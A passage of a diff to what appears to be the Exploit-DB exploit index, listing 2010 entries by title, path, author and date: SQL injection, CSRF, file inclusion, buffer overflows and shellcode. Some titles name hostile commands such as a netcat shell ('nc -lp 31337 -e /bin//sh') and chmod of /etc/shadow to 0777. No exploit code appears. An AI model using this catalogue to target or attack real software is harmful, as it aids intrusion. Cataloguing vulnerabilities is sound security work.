-14106,platforms/php/webapps/14106.txt,"PHPDirector 0.30 (videos.php) SQL Injection Vulnerability",2010-06-29,Mr-AbdoX,php,webapps,0 -14107,platforms/php/webapps/14107.txt,"YPNinc JokeScript (ypncat_id) SQL Injection Vulnerability",2010-06-29,v3n0m,php,webapps,0 14109,platforms/php/webapps/14109.txt,"YPNinc PHP Realty Script (docID) SQL Injection Vulnerability",2010-06-29,v3n0m,php,webapps,0 14110,platforms/php/webapps/14110.txt,"Allomani - E-Store 1.0 - CSRF Add Admin Account",2010-06-29,G0D-F4Th3r,php,webapps,0 14111,platforms/php/webapps/14111.txt,"Allomani - Super Multimedia 2.5 - CSRF Add Admin Account",2010-06-29,G0D-F4Th3r,php,webapps,0 14112,platforms/php/webapps/14112.txt,"PageDirector CMS (result.php) SQL Injection Vulnerability",2010-06-29,v3n0m,php,webapps,0 -14113,platforms/linux/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(""/bin/sh"",""/bin/sh"",0) - 38 bytes",2010-06-29,"Jonathan Salwan",linux,shellcode,0 -14114,platforms/linux/webapps/14114.txt,"I-net Multi User Email Script SQLi Vulnerability",2010-06-29,"Inj3ct0r Team",linux,webapps,80 14115,platforms/windows/webapps/14115.txt,"Gekko CMS (SQL Injection) Vulnerability",2010-06-29,[]0iZy5,windows,webapps,80 -14116,platforms/linux/shellcode/14116.txt,"Linux/ARM - setuid(0) & kill(-1, SIGKILL) - 28 bytes",2010-06-29,"Jonathan Salwan",linux,shellcode,0 14117,platforms/multiple/webapps/14117.txt,"CubeCart PHP (shipkey parameter) <= 4.3.x - Remote SQL Injection",2010-06-29,"Core Security",multiple,webapps,80 +30100,platforms/windows/remote/30100.html,"British Telecommunications Consumer Webhelper 2.0.0.7 - Multiple Buffer Overflow Vulnerabilities",2007-05-29,"Will Dormann",windows,remote,0 14118,platforms/multiple/webapps/14118.txt,"LIOOSYS CMS (news.php) SQL Injection Vulnerability",2010-06-29,GlaDiaT0R,multiple,webapps,80 14119,platforms/lin_x86/shellcode/14119.c,"Polymorphic /bin/sh x86 linux shellcode",2010-06-29,gunslinger_,lin_x86,shellcode,0 +14274,platforms/php/webapps/14274.txt,"Joomla Music Manager Component LFI Vulnerability",2010-07-08,Sid3^effects,php,webapps,0 +14142,platforms/linux/shellcode/14142.c,"Linux/ARM - polymorphic chmod(""/etc/shadow""_ 0777) (84 Bytes)",2010-06-30,"Florian Gaultier",linux,shellcode,0 14121,platforms/multiple/dos/14121.c,"Adobe Reader 9.3.2 (CoolType.dll) Remote Memory Corruption / DoS Vulnerability",2010-06-29,LiquidWorm,multiple,dos,0 -14122,platforms/linux/shellcode/14122.txt,"Linux/ARM chmod(""/etc/shadow"", 0777) Shellcode 35 Bytes",2010-06-29,"Florian Gaultier",linux,shellcode,0 +14122,platforms/linux/shellcode/14122.txt,"Linux/ARM chmod(""/etc/shadow""_ 0777) Shellcode (35 Bytes)",2010-06-29,"Florian Gaultier",linux,shellcode,0 14123,platforms/php/webapps/14123.txt,"WebDM CMS SQL Injection Vulnerability",2010-06-29,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 14124,platforms/php/webapps/14124.pl,"PHP-Nuke <= 8.0 - Remote SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 14125,platforms/php/webapps/14125.pl,"ShopCartDx <= 4.30 - (products.php) Blind SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 14126,platforms/php/webapps/14126.txt,"joomla component gamesbox com_gamesbox 1.0.2 - (id) SQL Injection Vulnerability",2010-06-30,v3n0m,php,webapps,0 14127,platforms/php/webapps/14127.txt,"Joomla Joomanager SQL Injection Vulnerability",2010-06-30,Sid3^effects,php,webapps,0 -14128,platforms/php/webapps/14128.txt,"Joomla Component com_wmtpic 1.0 - SQL Injection Vulnerability",2010-06-30,RoAd_KiLlEr,php,webapps,0 -14129,platforms/linux/webapps/14129.txt,"I-net Multi User Email Script SQLi Vulnerability",2010-06-30,Sid3^effects,linux,webapps,0 +14141,platforms/php/webapps/14141.pl,"Oxygen2PHP <= 1.1.3 (member.php) SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 14132,platforms/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",php,webapps,0 14139,platforms/linux/shellcode/14139.c,"Linux/ARM - Disable ASLR Security - 102 bytes",2010-06-30,"Jonathan Salwan",linux,shellcode,0 -14141,platforms/php/webapps/14141.pl,"Oxygen2PHP <= 1.1.3 (member.php) SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 -14142,platforms/linux/shellcode/14142.c,"Linux/ARM - polymorphic chmod(""/etc/shadow"", 0777) - 84 Bytes",2010-06-30,"Florian Gaultier",linux,shellcode,0 14144,platforms/php/webapps/14144.txt,"Specialist Bed and Breakfast Website SQL Injection Vulnerability",2010-06-30,JaMbA,php,webapps,0 14145,platforms/php/webapps/14145.txt,"Golf Club Site SQL Injection Vulnerability",2010-06-30,JaMbA,php,webapps,0 14146,platforms/hardware/webapps/14146.txt,"Ubiquity Nanostation5 (Air OS) - Remote Command Execution (0day)",2010-06-30,emgent,hardware,webapps,80 @@ -12397,38 +12449,39 @@ id,file,description,date,author,platform,type,port 14153,platforms/windows/local/14153.pl,"Mediacoder 0.7.3.4682 - Universal Buffer Overflow (SEH)",2010-07-01,Madjix,windows,local,0 14154,platforms/php/webapps/14154.txt,"Joomla Component com_dateconverter 0.1 - SQL Injection Vulnerability",2010-07-01,RoAd_KiLlEr,php,webapps,0 14155,platforms/asp/webapps/14155.txt,"SIDA University System SQL Injection Vulnerability",2010-07-01,K053,asp,webapps,0 +14209,platforms/php/webapps/14209.txt,"Joomla Front-End Article Manager System Upload Vulnerability",2010-07-04,Sid3^effects,php,webapps,0 14156,platforms/windows/dos/14156.txt,"Windows Vista/Server 2008 NtUserCheckAccessForIntegrityLevel Use-after-free Vulnerability",2010-07-01,MSRC,windows,dos,0 -14158,platforms/windows/local/14158.pl,"Mini-Stream RM-MP3 Converter 3.1.2.1 - (.m3u) Buffer Overflow",2010-07-01,Madjix,windows,local,0 -14160,platforms/php/webapps/14160.txt,"InterScan Web Security 5.0 Permanent XSS",2010-07-01,"Ivan Huertas",php,webapps,0 -14162,platforms/php/webapps/14162.txt,"iScripts EasySnaps 2.0 - Multiple SQL Injection Vulnerabilities",2010-07-01,"Salvatore Fresta",php,webapps,0 +14165,platforms/php/webapps/14165.txt,"iScripts EasyBiller Cross-Site Scripting Vulnerabilities",2010-07-02,Sangteamtham,php,webapps,0 14163,platforms/php/webapps/14163.txt,"iScripts ReserveLogic 1.0 - SQL Injection Vulnerability",2010-07-01,"Salvatore Fresta",php,webapps,0 14164,platforms/php/webapps/14164.txt,"iScripts CyberMatch 1.0 - Blind SQL Injection Vulnerability",2010-07-02,"Salvatore Fresta",php,webapps,0 -14165,platforms/php/webapps/14165.txt,"iScripts EasyBiller Cross-Site Scripting Vulnerabilities",2010-07-02,Sangteamtham,php,webapps,0 +14160,platforms/php/webapps/14160.txt,"InterScan Web Security 5.0 Permanent XSS",2010-07-01,"Ivan Huertas",php,webapps,0 +14177,platforms/linux/webapps/14177.txt,"Xplico 0.5.7 - (add.ctp) Remote XSS Vulnerability",2010-07-02,"Marcos Garcia and Maximiliano Soler",linux,webapps,0 +14162,platforms/php/webapps/14162.txt,"iScripts EasySnaps 2.0 - Multiple SQL Injection Vulnerabilities",2010-07-01,"Salvatore Fresta",php,webapps,0 +14176,platforms/php/webapps/14176.c,"iScripts SocialWare 2.2.x - Arbitrary File Upload Vulnerability",2010-07-02,"Salvatore Fresta",php,webapps,0 14166,platforms/php/webapps/14166.txt,"Bit Weaver 2.7 - Local File Inclusion Vulnerability",2010-07-02,"John Leitch",php,webapps,0 -14168,platforms/asp/webapps/14168.txt,"VGM Forbin (article.asp) SQL Injection Vulnerable",2010-07-02,"Th3 RDX",asp,webapps,0 -14169,platforms/asp/webapps/14169.txt,"MooreAdvice (productlist.asp) SQL Injection Vulnerable",2010-07-02,"Th3 RDX",asp,webapps,0 -14170,platforms/php/webapps/14170.txt,"Pointter Social Network LFI Vulnerablility",2010-07-02,Sid3^effects,php,webapps,0 14171,platforms/php/webapps/14171.txt,"Iphone Pointter Social Network LFI Vulnerablility",2010-07-02,Sid3^effects,php,webapps,0 14172,platforms/php/webapps/14172.txt,"Joomla Seyret Video Component (com_seyret) Blind SQL Injection Exploit",2010-07-02,RoAd_KiLlEr,php,webapps,0 +14170,platforms/php/webapps/14170.txt,"Pointter Social Network LFI Vulnerablility",2010-07-02,Sid3^effects,php,webapps,0 +14168,platforms/asp/webapps/14168.txt,"VGM Forbin (article.asp) SQL Injection Vulnerable",2010-07-02,"Th3 RDX",asp,webapps,0 +14169,platforms/asp/webapps/14169.txt,"MooreAdvice (productlist.asp) SQL Injection Vulnerable",2010-07-02,"Th3 RDX",asp,webapps,0 14175,platforms/windows/dos/14175.pl,"Mp3 Digitalbox 2.7.2.0 - (.mp3) Local Stack Overflow PoC",2010-07-02,v3n0m,windows,dos,0 -14176,platforms/php/webapps/14176.c,"iScripts SocialWare 2.2.x - Arbitrary File Upload Vulnerability",2010-07-02,"Salvatore Fresta",php,webapps,0 -14177,platforms/linux/webapps/14177.txt,"Xplico 0.5.7 - (add.ctp) Remote XSS Vulnerability",2010-07-02,"Marcos Garcia and Maximiliano Soler",linux,webapps,0 +14183,platforms/php/webapps/14183.txt,"Joomla Component Seyret (com_seyret) - Local File Inclusion Vulnerability",2010-07-03,"Cooler_ unix",php,webapps,0 14179,platforms/windows/remote/14179.txt,"Microsoft Internet Information Services (IIS) 5 - Authentication Bypass Vulnerability (MS10-065)",2010-07-02,"Soroush Dalili",windows,remote,0 14180,platforms/windows/remote/14180.py,"HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14181,platforms/windows/remote/14181.py,"HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14182,platforms/windows/remote/14182.py,"HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 -14183,platforms/php/webapps/14183.txt,"Joomla Component Seyret (com_seyret) - Local File Inclusion Vulnerability",2010-07-03,"Cooler_ unix",php,webapps,0 +14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS SQL Injection Vulnerability",2010-07-03,"Arash Saadatfar",asp,webapps,0 14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0 14185,platforms/multiple/dos/14185.py,"ISC-DHCPD Denial of Service",2010-07-03,sid,multiple,dos,0 +14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0 14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting Add-On Remote File Inclusion Vulnerability",2010-07-03,lumut--,php,webapps,0 14187,platforms/php/webapps/14187.txt,"Joomla eventcal Component 1.6.4 com_eventcal Blind SQL Injection Vulnerability",2010-07-03,RoAd_KiLlEr,php,webapps,0 14188,platforms/php/webapps/14188.html,"Cpanel 11.25 - CSRF Add FTP Account Exploit",2010-07-03,G0D-F4Th3r,php,webapps,0 -14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(""/bin/sh"", [""/bin/sh""], NULL); - XOR 88 encoded - 78 bytes",2010-07-03,"Jonathan Salwan",arm,shellcode,0 -14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0 -14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS SQL Injection Vulnerability",2010-07-03,"Arash Saadatfar",asp,webapps,0 +14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(""/bin/sh""_ [""/bin/sh""]_ NULL); - XOR 88 encoded (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0 14193,platforms/php/webapps/14193.c,"iscripts socialware 2.2.x - Multiple Vulnerabilities",2010-07-03,"Salvatore Fresta",php,webapps,0 14194,platforms/windows/remote/14194.cpp,"Sun Java Web Server 7.0 u7 - Remote Exploit",2010-07-03,dmc,windows,remote,0 14195,platforms/windows/remote/14195.html,"SasCam WebCam Server 2.6.5 - ActiveX SEH Overwrite",2010-07-03,blake,windows,remote,0 +14208,platforms/php/webapps/14208.txt,"Sandbox 2.0.2 - Local File Inclusion Vulnerability",2010-07-04,saudi0hacker,php,webapps,0 14196,platforms/php/webapps/14196.txt,"Joomla SocialAds Component com_socialads Persistent XSS Vulnerability",2010-07-03,Sid3^effects,php,webapps,0 14197,platforms/php/webapps/14197.txt,"iScripts MultiCart 2.2 - Multiple SQL Injection Vulnerability",2010-07-03,"Salvatore Fresta",php,webapps,0 14198,platforms/php/webapps/14198.txt,"Simple:Press Wordpress Plugin 4.3.0 - SQL Injection Vulnerability",2010-07-04,"ADEO Security",php,webapps,0 @@ -12441,9 +12494,8 @@ id,file,description,date,author,platform,type,port 14205,platforms/php/webapps/14205.txt,"Esoftpro Online Photo Pro Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 14206,platforms/php/webapps/14206.txt,"Esoftpro Online Contact Manager Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 14207,platforms/php/webapps/14207.txt,"Joomla Phoca Gallery Component (com_phocagallery) SQL Injection Vulnerability",2010-07-04,RoAd_KiLlEr,php,webapps,0 -14208,platforms/php/webapps/14208.txt,"Sandbox 2.0.2 - Local File Inclusion Vulnerability",2010-07-04,saudi0hacker,php,webapps,0 -14209,platforms/php/webapps/14209.txt,"Joomla Front-End Article Manager System Upload Vulnerability",2010-07-04,Sid3^effects,php,webapps,0 14210,platforms/php/webapps/14210.txt,"Joomla Front-edit Address Book Component (com_addressbook) Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0 +14222,platforms/windows/remote/14222.py,"UFO: Alien Invasion 2.2.1 - BoF Exploit (Win7 ASLR and DEP Bypass)",2010-07-05,Node,windows,remote,0 14211,platforms/php/webapps/14211.txt,"Joomla NijnaMonials Component (com_ninjamonials) Blind SQL Injection Vulnerability",2010-07-04,Sid3^effects,php,webapps,0 14213,platforms/php/webapps/14213.txt,"Joomla Component Sef (com_sef) - LFI Vulnerability",2010-07-05,_mlk_,php,webapps,0 14214,platforms/php/webapps/14214.txt,"bbPress 1.0.2 - CSRF Change Admin Password",2010-07-05,saudi0hacker,php,webapps,0 @@ -12451,9 +12503,9 @@ id,file,description,date,author,platform,type,port 14216,platforms/linux/shellcode/14216.c,"97 bytes Linx x86 bind shell port 64533",2010-07-05,Magnefikko,linux,shellcode,0 14217,platforms/php/webapps/14217.txt,"WikiWebHelp 0.28 - SQL Injection Vulnerability",2010-07-05,"ADEO Security",php,webapps,0 14218,platforms/linux/shellcode/14218.c,"161 bytes Drop suid shell root in /tmp/.hiddenshell Linux Polymorphic Shellcode",2010-07-05,gunslinger_,linux,shellcode,0 -14219,platforms/linux/shellcode/14219.c,"62 bytes setreuid(0,0) execve(""/bin/sh"",NULL,NULL) XOR Encoded Linux Shellcode",2010-07-05,gunslinger_,linux,shellcode,0 +14219,platforms/linux/shellcode/14219.c,"setreuid(0_0) execve(""/bin/sh""_NULL_NULL) XOR Encoded Linux Shellcode (62 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 +14250,platforms/php/webapps/14250.txt,"Joomla NeoRecruit (com_neorecruit Itemid) Blind SQL Injection Vulnerability",2010-07-06,Sid3^effects,php,webapps,0 14221,platforms/windows/shellcode/14221.html,"Safari JS JITed shellcode - exec calc (ASLR/DEP bypass)",2010-07-05,"Alexey Sintsov",windows,shellcode,0 -14222,platforms/windows/remote/14222.py,"UFO: Alien Invasion 2.2.1 - BoF Exploit (Win7 ASLR and DEP Bypass)",2010-07-05,Node,windows,remote,0 14223,platforms/php/webapps/14223.txt,"Bs Scripts_Directory SQL Injection/Auth Bypass Vulnerability",2010-07-05,Sid3^effects,php,webapps,0 14224,platforms/php/webapps/14224.txt,"Bs Recipes_Website Script SQL Injection/Auth Bypass Vulnerability",2010-07-05,Sid3^effects,php,webapps,0 14225,platforms/php/webapps/14225.txt,"Bs Realtor_Web Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0 @@ -12462,11 +12514,12 @@ id,file,description,date,author,platform,type,port 14228,platforms/php/webapps/14228.txt,"Bs General_Classifieds Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0 14229,platforms/php/webapps/14229.txt,"Bs Auto_Classifieds Script - (articlesdetails.php) SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0 14230,platforms/php/webapps/14230.txt,"Bs Business_Directory Script SQL Injection/Auth Bypass Vulnerability",2010-07-05,Sid3^effects,php,webapps,0 +33410,platforms/php/webapps/33410.txt,"Drupal Sections 5.x-1.2/6.x-1.2 Module HTML Injection Vulnerability",2009-12-16,"Justin C. Klein Keane",php,webapps,0 14232,platforms/php/webapps/14232.txt,"Joomla JPodium Component (com_jpodium) SQL Injection Vulnerability",2010-07-05,RoAd_KiLlEr,php,webapps,0 14233,platforms/php/webapps/14233.txt,"Bs Auction Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0 14234,platforms/linux/shellcode/14234.c,"125 bind port to 6778 XOR encoded polymorphic linux shellcode .",2010-07-05,gunslinger_,linux,shellcode,0 -14235,platforms/linux/shellcode/14235.c,"91 bytes nc -lp 31337 -e /bin//sh polymorphic linux shellcode .",2010-07-05,gunslinger_,linux,shellcode,0 14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 Admin Interface DoS",2010-07-06,muts,windows,dos,8800 +14235,platforms/linux/shellcode/14235.c,"91 bytes nc -lp 31337 -e /bin//sh polymorphic linux shellcode .",2010-07-05,gunslinger_,linux,shellcode,0 14237,platforms/php/webapps/14237.txt,"IBM Bladecenter Management - Multiple Web application vulnerabilities",2010-07-06,"Alexey Sintsov",php,webapps,0 14238,platforms/php/webapps/14238.txt,"BS Auction <= SQL Injection Vulnerability Exploit",2010-07-06,"Easy Laster",php,webapps,0 14239,platforms/php/webapps/14239.txt,"Auto Dealer <= SQL Injection Vulnerability Proof of Concept",2010-07-06,"Easy Laster",php,webapps,0 @@ -12476,68 +12529,61 @@ id,file,description,date,author,platform,type,port 14243,platforms/php/webapps/14243.txt,"BS Events Directory (articlesdetails.php) SQL Injection Vulnerability Proof of Concept",2010-07-06,"Easy Laster",php,webapps,0 14244,platforms/php/webapps/14244.txt,"Lyrics 3.0 - Engine SQL Injection Vulnerability",2010-07-06,Sid3^effects,php,webapps,0 14245,platforms/php/webapps/14245.txt,"Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability & Auth Bypass Vulnerabilty.",2010-07-06,**RoAd_KiLlEr**,php,webapps,0 -14247,platforms/php/webapps/14247.txt,"Auction_Software Script Admin Login Bypass Vulnerability",2010-07-06,"ALTBTA ",php,webapps,0 14248,platforms/windows/remote/14248.py,"minerCPP 0.4b Remote BOF+Format String Attack Exploit",2010-07-06,l3D,windows,remote,0 14249,platforms/php/webapps/14249.txt,"Joomla com_autartimonial Sqli Vulnerability",2010-07-06,Sid3^effects,php,webapps,0 -14250,platforms/php/webapps/14250.txt,"Joomla NeoRecruit (com_neorecruit Itemid) Blind SQL Injection Vulnerability",2010-07-06,Sid3^effects,php,webapps,0 14251,platforms/php/webapps/14251.txt,"PsNews 1.3 - SQL Injection Vulnerability",2010-07-06,S.W.T,php,webapps,0 14254,platforms/osx/remote/14254.py,"EvoCam Web Server OS X ROP Remote Exploit (Snow Leopard)",2010-07-06,d1dn0t,osx,remote,0 +14285,platforms/windows/webapps/14285.txt,"Outlook Web Access 2007 - CSRF Vulnerability",2010-07-08,"Rosario Valotta",windows,webapps,0 14255,platforms/php/webapps/14255.txt,"sandbox 2.0.3 - Multiple Vulnerabilities",2010-07-06,"Salvatore Fresta",php,webapps,0 14256,platforms/windows/local/14256.txt,"HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0 -14257,platforms/windows/remote/14257.py,"Hero DVD Remote 1.0 - Buffer Overflow Exploit",2010-07-07,chap0,windows,remote,0 14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Local Exploit Direct Ret ver.",2010-07-07,chap0,windows,local,0 14259,platforms/php/webapps/14259.txt,"SQL Injection Vulnerabilities Green Shop",2010-07-07,PrinceofHacking,php,webapps,0 14260,platforms/php/webapps/14260.txt,"Sijio Community Software SQL Injection/Persistent XSS Vulnerability",2010-07-07,Sid3^effects,php,webapps,0 -14261,platforms/arm/shellcode/14261.c,"ARM Polymorphic execve(""/bin/sh"", [""/bin/sh""], NULL) Shellcode Generator",2010-07-07,"Jonathan Salwan",arm,shellcode,0 +14261,platforms/arm/shellcode/14261.c,"ARM Polymorphic execve(""/bin/sh""_ [""/bin/sh""]_ NULL) Shellcode Generator",2010-07-07,"Jonathan Salwan",arm,shellcode,0 14262,platforms/php/webapps/14262.txt,"Simple Document Management System (SDMS) SQL Injection Vulnerability",2010-07-07,Sid3^effects,php,webapps,0 -14263,platforms/php/webapps/14263.txt,"artforms 2.1b7.2 rc2 joomla component Multiple Vulnerabilities",2010-07-07,"Salvatore Fresta",php,webapps,0 14264,platforms/hardware/webapps/14264.html,"Harris Stratex StarMAX 2100 WIMAX Subscriber Station Running Config CSRF Exploit",2010-07-07,kalyanakumar,hardware,webapps,0 +14263,platforms/php/webapps/14263.txt,"artforms 2.1b7.2 rc2 joomla component Multiple Vulnerabilities",2010-07-07,"Salvatore Fresta",php,webapps,0 14265,platforms/php/webapps/14265.txt,"Joomla PaymentsPlus - Mtree 2.1.5 - Blind SQL Injection Vulnerability",2010-07-07,Sid3^effects,php,webapps,0 -14266,platforms/windows/dos/14266.pl,"IrcDelphi Daemon Server Denial of Service",2010-07-08,Crash,windows,dos,6667 14267,platforms/windows/remote/14267.txt,"EA Battlefield 2 and Battlefield 2142 - Multiple Arbitrary File Upload Vulnerabilities",2010-07-08,"Luigi Auriemma",windows,remote,0 14268,platforms/multiple/dos/14268.txt,"Qt 4.6.3 - ""QSslSocketBackendPrivate::transmit()"" Denial of Service",2010-07-08,"Luigi Auriemma",multiple,dos,0 14269,platforms/windows/remote/14269.html,"FathFTP 1.7 - ActiveX Buffer Overflow",2010-07-08,blake,windows,remote,0 14270,platforms/php/webapps/14270.txt,"Zylone IT Multiple Blind SQL Injection Vulnerability",2010-07-08,Callo,php,webapps,0 14271,platforms/php/webapps/14271.txt,"pithcms (theme) Local Remote File inclusion Vulnerability",2010-07-08,eidelweiss,php,webapps,0 14272,platforms/osx/remote/14272.py,"UFO: Alien Invasion 2.2.1 - IRC Client Remote Code Execution - OS X Snow Leopard (ROP)",2010-07-08,d1dn0t,osx,remote,0 -14273,platforms/linux/local/14273.sh,"Ubuntu PAM MOTD File Tampering (Privilege Escalation)",2010-07-08,"Kristian Erik Hermansen",linux,local,0 -14274,platforms/php/webapps/14274.txt,"Joomla Music Manager Component LFI Vulnerability",2010-07-08,Sid3^effects,php,webapps,0 14275,platforms/windows/remote/14275.txt,"Real Player 12.0.0.879 (0day)",2010-07-08,webDEViL,windows,remote,0 14276,platforms/linux/shellcode/14276.c,"Find all writeable folder in filesystem linux polymorphic shellcode - 91 bytes",2010-07-08,gunslinger_,linux,shellcode,0 14277,platforms/php/webapps/14277.txt,"Inout Music 1.0 - Shell Upload Vulnerabilty",2010-07-08,SONIC,php,webapps,0 14278,platforms/php/webapps/14278.txt,"Inout Article Base Ultimate Shell Upload Vulnerabilty",2010-07-08,SONIC,php,webapps,0 14279,platforms/php/webapps/14279.txt,"Inout Ad server Ultimate Shell Upload Vulnerabilty",2010-07-08,SONIC,php,webapps,0 14280,platforms/php/webapps/14280.txt,"PG Social Networking Shell Upload Vulnerabilty",2010-07-08,SONIC,php,webapps,0 +14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter Integer Overflow and Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0 14281,platforms/asp/webapps/14281.txt,"KMSoft GB SQL Injection Vulnerabilty",2010-07-08,SONIC,asp,webapps,0 14282,platforms/windows/dos/14282.txt,"cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0 14283,platforms/asp/webapps/14283.txt,"ClickGallery Server SQL Injection Vulnerability",2010-07-08,SONIC,asp,webapps,0 14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerability",2010-07-08,SONIC,asp,webapps,0 -14285,platforms/windows/webapps/14285.txt,"Outlook Web Access 2007 - CSRF Vulnerability",2010-07-08,"Rosario Valotta",windows,webapps,0 -14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter Integer Overflow and Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0 14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Exploit with DEP bypass",2010-07-09,dmc,windows,remote,0 14288,platforms/multiple/shellcode/14288.asm,"Write-to-file Shellcode (Win32)",2010-07-09,"Brett Gervasoni",multiple,shellcode,0 14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery [CSRF]",2010-07-09,saudi0hacker,php,webapps,0 14290,platforms/windows/dos/14290.py,"MP3 Cutter 1.5 - DoS Exploit",2010-07-09,"Prashant Uniyal",windows,dos,0 -14291,platforms/php/webapps/14291.txt,"IXXO Cart for Joomla SQLi Vulnerability",2010-07-09,Sid3^effects,php,webapps,0 14293,platforms/php/webapps/14293.txt,"Minify4Joomla Upload and Persistent XSS Vulnerability",2010-07-09,Sid3^effects,php,webapps,0 -14294,platforms/php/webapps/14294.txt,"sphider 1.3.5 - Remote File Inclusion Vulnerability",2010-07-09,Li0n-PaL,php,webapps,0 -14295,platforms/windows/dos/14295.html,"Microsoft MSHTML.DLL CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak (0day)",2010-07-09,"Ruben Santamarta ",windows,dos,0 -14296,platforms/php/webapps/14296.txt,"Joomla QuickFAQ Component (com_quickfaq) Blind SQL Injection Vulnerability",2010-07-09,RoAd_KiLlEr,php,webapps,0 -14299,platforms/php/webapps/14299.txt,"CMS Contentia (news.php) SQL Injection Vulnerability",2010-07-09,GlaDiaT0R,php,webapps,0 -14305,platforms/linux/shellcode/14305.c,"Linux/x86-64 - execve(""/sbin/iptables"", [""/sbin/iptables"", ""-F""], NULL) - 49 bytes",2010-07-09,10n1z3d,linux,shellcode,0 -14306,platforms/php/webapps/14306.txt,"HoloCMS 9.0.47 (news.php) SQL Injection Vulnerability",2010-07-09,GlaDiaT0R,php,webapps,0 -14308,platforms/php/webapps/14308.txt,"Wordpress Firestats Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0 -14309,platforms/windows/remote/14309.html,"RSP MP3 Player OCX 3.2 - ActiveX Buffer Overflow",2010-07-09,blake,windows,remote,0 -14310,platforms/php/webapps/14310.js,"DotDefender <= 3.8-5 No Authentication Remote Code Execution Through XSS",2010-07-09,rAWjAW,php,webapps,80 +14291,platforms/php/webapps/14291.txt,"IXXO Cart for Joomla SQLi Vulnerability",2010-07-09,Sid3^effects,php,webapps,0 +14434,platforms/php/webapps/14434.txt,"Joomla Component com_jomtube (user_id) Blind SQL Injection / SQL Injection",2010-07-22,SixP4ck3r,php,webapps,0 14312,platforms/php/webapps/14312.txt,"Joomla redSHOP Component 1.0 (com_redshop pid) - SQL Injection Vulnerability",2010-07-10,v3n0m,php,webapps,0 +14296,platforms/php/webapps/14296.txt,"Joomla QuickFAQ Component (com_quickfaq) Blind SQL Injection Vulnerability",2010-07-09,RoAd_KiLlEr,php,webapps,0 +14316,platforms/php/webapps/14316.pl,"PHP-Nuke <= 8.0 (Web_Links Module) Remote Blind SQL Injection Exploit",2010-07-10,yawn,php,webapps,0 +14299,platforms/php/webapps/14299.txt,"CMS Contentia (news.php) SQL Injection Vulnerability",2010-07-09,GlaDiaT0R,php,webapps,0 +14305,platforms/linux/shellcode/14305.c,"Linux/x86-64 - execve(""/sbin/iptables""_ [""/sbin/iptables""_ ""-F""]_ NULL) (49 bytes)",2010-07-09,10n1z3d,linux,shellcode,0 +14306,platforms/php/webapps/14306.txt,"HoloCMS 9.0.47 (news.php) SQL Injection Vulnerability",2010-07-09,GlaDiaT0R,php,webapps,0 +14309,platforms/windows/remote/14309.html,"RSP MP3 Player OCX 3.2 - ActiveX Buffer Overflow",2010-07-09,blake,windows,remote,0 +14308,platforms/php/webapps/14308.txt,"Wordpress Firestats Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0 +15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS",2010-10-23,d0lc3,windows,dos,0 +14310,platforms/php/webapps/14310.js,"DotDefender <= 3.8-5 No Authentication Remote Code Execution Through XSS",2010-07-09,rAWjAW,php,webapps,80 14313,platforms/php/webapps/14313.txt,"Joomla MyHome Component (com_myhome) Blind SQL Injection Vulnerability",2010-07-10,Sid3^effects,php,webapps,0 14315,platforms/php/webapps/14315.txt,"Joomla MySms Component (com_mysms) Upload Vulnerability",2010-07-10,Sid3^effects,php,webapps,0 -14316,platforms/php/webapps/14316.pl,"PHP-Nuke <= 8.0 (Web_Links Module) Remote Blind SQL Injection Exploit",2010-07-10,yawn,php,webapps,0 +14335,platforms/php/webapps/14335.txt,"Joomla Health & Fitness Stats Persistent XSS 